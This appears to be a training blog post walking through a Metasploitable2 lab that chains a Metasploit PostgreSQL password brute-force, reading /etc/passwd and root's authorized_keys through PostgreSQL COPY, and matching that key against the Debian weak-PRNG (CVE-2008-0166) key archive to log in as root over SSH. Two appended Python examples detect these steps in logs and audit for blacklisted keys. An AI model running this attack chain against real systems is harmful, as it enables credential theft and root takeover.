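Information Security (old version)/Metasploit 2016. 6. 3. 10:54
Metasploit - 07. Vulnerability Discovery and Attack (CVE-2008-0166)
This material is put together for hands-on practice in a training course. Anyone who uses it for personal or malicious purposes bears the legal responsibility themselves.
[Lab systems] Kali Linux, Firewall, Metasploitable2-Linux
- CVE-2008-0166 refers to the random number generation vulnerability in the Debian OpenSSL package.
- Because the random data used when a cryptographic key is generated can be guessed, the weakness can be exploited.
- If it can be exploited, the cryptographic keys are compromised and sensitive data becomes accessible.
- Only Debian OpenSSL versions before 0.9.8c-4etch3 are affected
- exploit-db site -> search -> search for CVE-2008-0166
- https://www.exploit-db.com/exploits/5720/
[Lab steps]
Scan -> PostgreSQL ID/password attack -> PostgreSQL login -> obtain user account information ->
SSH key attack -> SSH login
Ex1) Set the administrator password on Metasploitable2-Linux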
@ Metasploitable2-Linux
msfadmin@metasploitable:~$ sudo -s
[sudo] password for msfadmin: msfadmin
root@metasploitable:~# passwd
Enter new UNIX password: toor
Retype new UNIX password : toor
passwd : password updated successfully
root@metasploitable:~# exit
logout
msfadmin@metasploitable:~$
Ex2) Download and extract the SSH RSA files
@ Kali Linux
- Search Exploit DB for OpenSSL
root@kali:~# /usr/share/exploitdb/searchsploit openssl
--------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------- ----------------------------------
OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs | ./multiple/dos/146.c
Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c) | ./linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit | ./multiple/dos/4773.pl
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl) | ./multiple/remote/5622.txt
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Ruby) | ./multiple/remote/5632.rb
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python) | ./linux/remote/5720.py
~ (output omitted) ~
- Check the SSH RSA information and the download link (file '5622.txt')
root@kali:~# cat /usr/share/exploitdb/platforms/multiple/remote/5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
2. Extract it to a directory
~ (output omitted) ~
- Download the SSH RSA files
root@kali:~# cd /var/tmp
root@kali:/var/tmp#
root@kali:/var/tmp# wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2
--2016-06-03 11:28:57-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2
Resolving github.com (github.com)... 192.30.252.121
Connecting to github.com (github.com)|192.30.252.121|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/5622.tar.bz2 [following]
--2016-06-03 11:28:58-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/5622.tar.bz2
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 103.245.222.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|103.245.222.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 50226987 (48M) [application/octet-stream]
Saving to: ‘5622.tar.bz2’
5622.tar.bz2 100%[===============================>] 47.90M 989KB/s in 33s
2016-06-03 11:29:34 (1.45 MB/s) - ‘5622.tar.bz2’ saved [50226987/50226987]
- Extract the SSH RSA archive
root@kali:/var/tmp# tar xvif 5622.tar.bz2
rsa/
rsa/2048/
rsa/2048/2712a6d5cec99f295a0c468b830a370d-28940.pub
rsa/2048/eaddc9bba9bf3c0832f443706903cd14-28712.pub
~ (output omitted) ~
root@kali:~#
Ex3) Scan '192.168.20.204'
- Use nmap to scan '192.168.20.204'.
@ Kali Linux
root@kali:~# nmap -sV 192.168.20.204
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 12:06 KST
Nmap scan report for 192.168.20.204
Host is up (0.00061s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:34:5A:8A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds
Ex4) Dictionary attack on the PostgreSQL username/password
root@kali:~# msfconsole -q
msf > search postgres_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) >
msf auxiliary(postgres_login) > show options
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target address range or CIDR identifier
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME postgres no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(postgres_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204
msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(postgres_login) > exploit
[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.20.204:5432 - LOGIN SUCCESSFUL: postgres:postgres@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) >
msf auxiliary(postgres_login) > exit
root@kali:~#
Ex5) Connect to the PostgreSQL server and inspect the database
@ Kali Linux
- Connect to PostgreSQL on Metasploitable2-Linux using 'postgres/postgres'.
root@kali:~# psql -h 192.168.20.204 -U postgres
Password for user postgres: postgres
psql (9.4.3, server 8.3.1)
SSL connection (protocol: TLSv1, cipher: DHE-RSA-AES256-SHA, bits: 256, compression: off)
Type "help" for help.
postgres=#
- Check the PostgreSQL version
postgres=# select version();
version
-----------------------------------------------------------------------------------------------
PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
(1 row)
- Check the user table
postgres=# select * from pg_user;
usename | usesysid | usecreatedb | usesuper | usecatupd | passwd | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
postgres | 10 | t | t | t | ******** | |
(1 row)
- Add a 'test' user and verify
postgres=# create user test with password 'test1234';
CREATE ROLE
postgres=# select * from pg_user;
usename | usesysid | usecreatedb | usesuper | usecatupd | passwd | valuntil | useconfig
----------+-----------+--------------+----------+-----------+----------+----------+-----------
postgres | 10 | t | t | t | ******** | |
test | 16384 | f | f | f | ******** | |
(2 rows)
- Raise the 'test' user's privileges and verify
postgres=# alter user test with superuser;
ALTER ROLE
postgres=# select * from pg_user;
usename | usesysid | usecreatedb | usesuper | usecatupd | passwd | valuntil | useconfig
----------+-----------+--------------+----------+-----------+----------+----------+-----------
postgres | 10 | t | t | t | ******** | |
test | 16384 | f | t | f | ******** | |
(2 rows)
- List all schemas and databases
postgres-# \dn
List of schemas
Name | Owner
--------+----------
public | postgres
(1 row)
postgres-# \l
List of databases
Name | Owner | Encoding | Access privileges
-----------+----------+----------+-----------------------
postgres | postgres | UTF8 |
template0 | postgres | UTF8 | =c/postgres +
| | | postgres=CTc/postgres
template1 | postgres | UTF8 | =c/postgres +
| | | postgres=CTc/postgres
(3 rows)
- Create an accounts table and copy the contents of '/etc/passwd' into it
postgres=# create table accounts (linux_users text);
CREATE TABLE
postgres=# copy accounts from '/etc/passwd';
COPY 37
- Show the rows of the accounts table that contain the string 'bash'
postgres=# select * from accounts where linux_users like '%bash%';
linux_users
------------------------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
(5 rows)
- Create an sshkeys table and copy the contents of '/root/.ssh/authorized_keys' into it
postgres=# create table sshkeys (auth_key text);
CREATE TABLE
postgres=# copy sshkeys from '/root/.ssh/authorized_keys';
COPY 1
- Show the rows of the sshkeys table that contain the string 'ssh-rsa'
postgres=# select * from sshkeys where auth_key like '%ssh-rsa%';
auth_key (END)
q |
- Disconnect from PostgreSQL
postgres=# \q
root@kali:~#
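Added example (not part of the original post): a defender-side check that picks the statement shapes used in Ex5 out of a PostgreSQL statement log. It assumes log_statement = 'all' and a timestamp/pid log_line_prefix; the log lines and the names find_suspicious and RULES are constructed for this example.

```python
import re

# Constructed PostgreSQL server log (log_statement = 'all'); the timestamp and
# [pid] prefix are an assumed log_line_prefix, not taken from the lab host.
SAMPLE_LOG = """\
2016-06-03 12:31:02 KST [4821] LOG:  statement: select version();
2016-06-03 12:33:40 KST [4821] LOG:  statement: create user test with password 'test1234';
2016-06-03 12:34:05 KST [4821] LOG:  statement: alter user test with superuser;
2016-06-03 12:36:11 KST [4821] LOG:  statement: create table accounts (linux_users text);
2016-06-03 12:36:20 KST [4821] LOG:  statement: copy accounts from '/etc/passwd';
2016-06-03 12:38:47 KST [4821] LOG:  statement: copy sshkeys from '/root/.ssh/authorized_keys';
2016-06-03 12:40:00 KST [4900] LOG:  statement: COPY orders FROM STDIN;
"""

STATEMENT = re.compile(r"LOG:\s+statement:\s+(?P<sql>.*)$")

# Statement shapes from Ex5: COPY against a quoted server-side path (which needs
# superuser-level rights) and a role being given SUPERUSER.
RULES = [
    ("server-side file read",
     re.compile(r"^copy\s+.+?\s+from\s+'(?P<arg>[^']+)'", re.I)),
    ("server-side file write",
     re.compile(r"^copy\s+.+?\s+to\s+'(?P<arg>[^']+)'", re.I)),
    ("superuser grant",
     re.compile(r"^(?:alter|create)\s+(?:user|role)\s+(?P<arg>\S+)\s.*\bsuperuser\b", re.I)),
]

def find_suspicious(log_text):
    """Return (rule label, path or role name) for every matching statement."""
    findings = []
    for line in log_text.splitlines():
        found = STATEMENT.search(line)
        if not found:
            continue  # not a statement line (connection messages, errors, ...)
        sql = found.group("sql")
        for label, rule in RULES:
            hit = rule.search(sql)
            if hit:
                findings.append((label, hit.group("arg")))
    return findings

if __name__ == "__main__":
    for label, arg in find_suspicious(SAMPLE_LOG):
        print(f"{label}: {arg}")
```

COPY ... FROM STDIN, which is what client-side imports send, is deliberately not flagged; only quoted server-side paths are.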
Ex6) Reconnect to the PostgreSQL server to obtain the SSH RSA key
- Query the sshkeys table and save the SSH key
root@kali:~# psql -h 192.168.20.204 -U postgres -c 'select * from sshkeys limit 1' | tee sshkeys.txt
Password for user postgres: postgres
auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
- Check the 'sshkeys.txt' file
root@kali:~# ls -l sshkeys.txt
-rw-r--r-- 1 root root 1229 6월 3 12:42 sshkeys.txt
root@kali:~# cat sshkeys.txt
auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
- Search 'sshkeys.txt' for the string 'ssh-rsa' and print the second field
root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}'
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w==
- Print it again with only the trailing '==' removed
root@kali:~# grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6
PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5te
oweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYg
ZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D
9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf
+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
- Search the '/var/tmp/rsa/2048/*.pub' files for the same content as in 'sshkeys.txt' and save the result as 'keys.txt'
root@kali:~# fgrep `grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'` /var/tmp/rsa/2048/*.pub | tee keys.txt
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG
70lShHQqldJkcteZZdPFSbW76IUiPR0OWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JX
ln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQ
PE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5
cCs4WocyVxsXovcNnbALTp3w== root@targetcluster
root@kali:~# ls keys.txt
keys.txt
root@kali:~# cat keys.txt
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG
70lShHQqldJkcteZZdPFSbW76IUiPR0OWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JX
ln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQ
PE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5
cCs4WocyVxsXovcNnbALTp3w== root@targetcluster
- From 'keys.txt', print only the name of the matching file in the '/var/tmp/rsa/2048' directory
root@kali:~# cat keys.txt | awk -F: '{print $1}'
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub
- Strip '.pub' from the file name and check the result
root@kali:~# cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
/var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429
- Connect to Metasploitable2-Linux over SSH
root@kali:~# ssh -i `cat keys.txt | awk -F: '{print $1}' | sed 's/.pub//'` root@192.168.20.204
The authenticity of host '192.168.20.204 (192.168.20.204)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.20.204' (RSA) to the list of known hosts.
Last login: Thu Jun 2 04:00:18 2016 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
root@metasploitable:~# exit
logout
Connection to 192.168.20.204 closed.
root@kali:~#
[Note] If the error message 'bash: /bin/fgrep: 인수 명단이 너무 김' (Argument list too long) appears, change to the rsa/2048 directory and use the 'xargs' command
- When '5622.tar.bz2' was extracted in root's home directory
root@kali:~# cd /root/rsa/2048
root@kali:~/rsa/2048#
root@kali:~/rsa/2048# ls *.pub | xargs fgrep `grep "ssh-rsa" /root/sshkeys.txt | awk '{print $2}' | sed 's/==$//'` | tee /root/keys.txt
root@kali:~/rsa/2048# cat /root/keys.txt
57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== root@targetcluster
root@kali:~/rsa/2048# cat /root/keys.txt | awk -F: '{print $1}'
57c3115d77c56390332dc5c49978627a-5429.pub
root@kali:~/rsa/2048# cat /root/keys.txt | awk -F: '{print $1}' | sed 's/.pub//'
57c3115d77c56390332dc5c49978627a-5429
root@kali:~/rsa/2048# ssh -i `cat /root/keys.txt | awk -F: '{print $1}' | sed 's/.pub//'` root@192.168.20.204
The authenticity of host '192.168.20.204 (192.168.20.204)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.20.204' (RSA) to the list of known hosts.
Last login: Sun Feb 25 21:56:50 2018 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#
root@metasploitable:~# exit
logout
Connection to 192.168.20.204 closed.
root@kali:~/rsa/2048#
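Added example (not part of the original post): the matching step of Ex6 turned into an audit a system owner can run over an authorized_keys file, comparing key fingerprints instead of grepping wrapped base64 text. It assumes the 32-hex-digit prefix of the archive's file names is the key's MD5 fingerprint; all function names and the sample keys are constructed for this example.

```python
import base64
import hashlib
import re

# Archive file names look like '<32 hex digits>-<pid>.pub'; the hex part is
# assumed here to be the MD5 fingerprint of the key in that file.
WEAK_NAME = re.compile(r"([0-9a-f]{32})-\d+\.pub$")

def blacklist_from_filenames(names):
    """Collect the fingerprint prefixes of all matching file names."""
    return {m.group(1) for m in map(WEAK_NAME.search, names) if m}

def parse_key_blob(line):
    """Return the decoded key blob of one authorized_keys line, or None."""
    fields = line.split()
    for i, field in enumerate(fields[:-1]):
        if not field.startswith(("ssh-", "ecdsa-")):
            continue  # still inside the options prefix
        try:
            blob = base64.b64decode(fields[i + 1], validate=True)
        except ValueError:
            continue
        size = int.from_bytes(blob[:4], "big")
        if blob[4:4 + size] == field.encode():  # type named inside the blob must agree
            return blob
    return None

def md5_fingerprint(blob):
    return hashlib.md5(blob).hexdigest()

def audit_authorized_keys(text, weak_md5):
    """Return (line number, MD5 fingerprint) for every blacklisted key."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        blob = None if line.lstrip().startswith("#") else parse_key_blob(line)
        if blob is not None and md5_fingerprint(blob) in weak_md5:
            hits.append((number, md5_fingerprint(blob)))
    return hits

def make_sample_blob(seed):
    """Constructed stand-in for a key: valid wire framing, meaningless modulus."""
    frame = lambda b: len(b).to_bytes(4, "big") + b
    modulus = b"\x00" + hashlib.sha256(seed).digest() * 8
    return frame(b"ssh-rsa") + frame(b"\x23") + frame(modulus)

def build_demo():
    """Constructed authorized_keys text and constructed archive file names."""
    weak, good = make_sample_blob(b"weak"), make_sample_blob(b"good")
    b64 = lambda blob: base64.b64encode(blob).decode()
    text = "\n".join(["# constructed sample",
                      "ssh-rsa " + b64(good) + " admin@host",
                      'command="/bin/true",no-pty ssh-rsa ' + b64(weak) + " root@old",
                      "ssh-rsa not-base64!! broken"])
    return text, ["rsa/2048/" + md5_fingerprint(weak) + "-5429.pub", "rsa/2048/README"]

if __name__ == "__main__":
    demo_text, demo_names = build_demo()
    for number, md5 in audit_authorized_keys(demo_text, blacklist_from_filenames(demo_names)):
        print(f"line {number}: blacklisted key {md5}")
```

Any key this reports should be removed from authorized_keys and replaced with one generated on a patched system.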